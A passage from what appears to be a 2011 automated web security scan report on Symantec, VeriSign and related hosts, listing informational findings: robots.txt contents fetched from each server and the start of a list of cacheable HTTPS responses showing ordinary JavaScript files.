Path:   /DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=94643838326,0)
Content-Length: 73
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app59
Accept-Ranges: bytes
Date: Fri, 09 Sep 2011 21:41:50 GMT
Connection: close

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

20.15. http://gs.instantservice.com/geoipAPI.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gs.instantservice.com
Path:   /geoipAPI.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:15:35 GMT
ETag: "21f297-1a-84ebdfc0"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

20.16. http://investor.symantec.com/phoenix.zhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.symantec.com
Path:   /phoenix.zhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investor.symantec.com

Response

HTTP/1.0 200 OK
Content-Length: 499
Content-Type: text/plain
Last-Modified: Fri, 09 Sep 2011 12:00:00 GMT
Accept-Ranges: bytes
ETag: "03eb00e86ecc1:3239"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Fri, 09 Sep 2011 21:42:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:42:04 GMT
Connection: close

# ========v2.7 - 1/20/11=========================#
# =====Block all bots except below entries between 8am and 8pm EST=====#

User-agent: fusionbot
Disallow: /preview
Disallow: /redesign
Disallow
...[SNIP]...

20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: knowledge.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache
Last-Modified: Wed, 01 Jun 2011 21:13:13 GMT
ETag: "b690c1-3c-4a4acfd02ec40"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: gsa-crawler
Allow: /

User-agent: *
Disallow: /

20.18. https://knowledge.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: knowledge.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
Last-Modified: Wed, 01 Jun 2011 21:12:44 GMT
ETag: "34ceb-3c-4a4acfb486b00"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: gsa-crawler
Allow: /

User-agent: *
Disallow: /

20.19. http://l.addthiscdn.com/live/t00/200lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/200lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/ubox/image

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox3.offermatica.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:24:34 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1a8177-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www606
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.22. http://partnerlocator.symantec.com/public/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /public/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partnerlocator.symantec.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:42 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 05 Feb 2010 14:46:53 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

20.23. http://player.ooyala.com/player.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 07 Aug 2011 04:04:05 GMT
X-Ooyala-Server-Id: i-cfd6a4a3
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 184
Connection: close

# This robots.txt is only for api.ooyala.com and backlot.ooyala.com. It should not be used for www.ooyala.com.
User-agent: *
Disallow: /
Allow: /backlot/web
Allow: /syndication/google

20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec

Summary

Severity:   Information
Confidence:   Certain
Host:   http://productadvisor.symantec.com
Path:   /app/en/US/adirect/symantec

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: productadvisor.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:12 GMT
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 19 Nov 2009 20:25:26 GMT
ETag: "518003-273-478bf28d55980"
Accept-Ranges: bytes
Content-Length: 627
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /*cmd=catCompare
Disallow: /*cmd=symExtCatProductCompare
Disallow: /*cmd=catProductDetail
Disallow: /*cmd=symExtCatProductDetail
Disallow: /*cmd=ProductPricer
Disallow:
...[SNIP]...

20.25. https://products.geotrust.com/signup/codesign.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.geotrust.com
Path:   /signup/codesign.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.geotrust.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:16 GMT
Content-Length: 26
Content-Type: text/plain

User-agent: *
Disallow: /

20.26. https://products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.verisign.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:28:04 GMT
Content-Length: 26
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
Disallow: /

20.27. http://query.verisign.ch/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:46:20 GMT
Connection: close

User-agent: *
Disallow: /

20.28. http://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:26:09 GMT
Connection: close

User-agent: *
Disallow: /

20.29. https://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: query.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:22 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:46:22 GMT
Connection: close

User-agent: *
Disallow: /

20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.instantservice.com
Path:   /resources/smartbutton/5851/II3_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.31. http://searchg.symantec.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://searchg.symantec.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: searchg.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:30 GMT
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 16:15:31 GMT
Content-Length: 26
Cache-Control: public, max-age=2592000
Expires: Sun, 09 Oct 2011 21:33:30 GMT
Connection: close

User-agent: *
Disallow: /

20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ssl-certificate-center.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35E8520EDB2D10DB64618BD14E31479C; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ssl-certificate-center.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36B3AC56DB2D10DB49F6B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.34. https://symantec-corporation.com/servlet/campaignrespondent

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /servlet/campaignrespondent

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: symantec-corporation.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 25 Aug 2010 22:10:50 GMT
ETag: "4500a0-1a-48ead277f8e80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: symantec.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:31:00 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

20.36. https://test-products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://test-products.verisign.com
Path:   /geocenter/reseller/logon.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: test-products.verisign.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:49 GMT
Content-Length: 26
Content-Type: text/plain

User-agent: *
Disallow: /

20.37. https://trust-center.verisign.ch/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trust-center.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=3836F65ADB2D10DB68D2A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.38. https://trust-center.verisign.com/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trust-center.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=6477053CDB2A10DB6A74CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.39. http://twitter.com/statuses/user_timeline/pctools.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/pctools.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:05:29 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Sat, 10 Sep 2011 22:05:29 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

20.40. http://us.norton.com/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain
Cache-Control: public, max-age=14760
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.41. https://us.norton.com/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.norton.com
Path:   /index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain
Cache-Control: public, max-age=21595
Date: Fri, 09 Sep 2011 21:47:34 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.42. https://www-secure.symantec.com/feedback/webmaster.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /feedback/webmaster.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Fri, 09 Sep 2011 17:26:24 GMT
ETag: "33-4e6a4c40"
Content-Type: text/plain
Cache-Control: public, max-age=8132
Date: Fri, 09 Sep 2011 21:47:33 GMT
Content-Length: 51
Connection: close

User-agent:*
Disallow:/*
Allow:/norton-support/


20.43. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 09 Sep 2011 21:25:58 GMT
Expires: Fri, 09 Sep 2011 21:25:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

20.44. http://www.symantec.com/scripts/swfobject.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /scripts/swfobject.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 18 May 2011 10:02:58 GMT
ETag: "1147-4dd39952"
Content-Type: text/plain
Cache-Control: public, max-age=1476
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 4423
Connection: close

# Standard List
User-agent: *
Disallow: /common/
Disallow: /content/
Disallow: /corp/
Disallow: /css/
Disallow: /ssi/
Disallow: /lib/
Disallow: /errors/
Disallow: /feedback/
Disallow: /media
...[SNIP]...

20.45. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.ch

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:21:58 GMT
ETag: "2e58be0-5a-49a38c4d54580"
Accept-Ranges: bytes
Content-Length: 90
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /dm/
Disallow: /images/
Disallow: /Unlinked_Pages/
Disallow: /dev/

20.46. http://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:38 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Accept-Ranges: bytes
Content-Length: 2539
Expires: Sun, 09 Oct 2011 21:24:38 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.47. https://www.verisign.com/products/site/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /products/site/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Accept-Ranges: bytes
Content-Length: 2539
Expires: Sun, 09 Oct 2011 21:27:47 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

21. Cacheable HTTPS response
There are 73 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/en_us/assets/shared/js/google-analytics.js

Request

GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69191
Expires: Sun, 09 Oct 2011 02:25:41 GMT
Content-Length: 461

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scr
...[SNIP]...

21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 8048


//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
   //document.get
...[SNIP]...

21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558


/*******************************************
**             Header functions             **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/jquery.autocomplete.js

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 14
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 Jörn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/home/js/home.js

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 16
Expires: Sun, 09 Oct 2011 21:38:32 GMT
Content-Length: 2725

/*******************************************
**         HP specific functions         **
*******************************************/


//External link functionality
$('a[rel="external"]').click(funct
...[SNIP]...

21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/global-preload.js

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518


// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/google-analytics.js

Request

GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

Summary

Severity:   Information
Confidence:   Certain
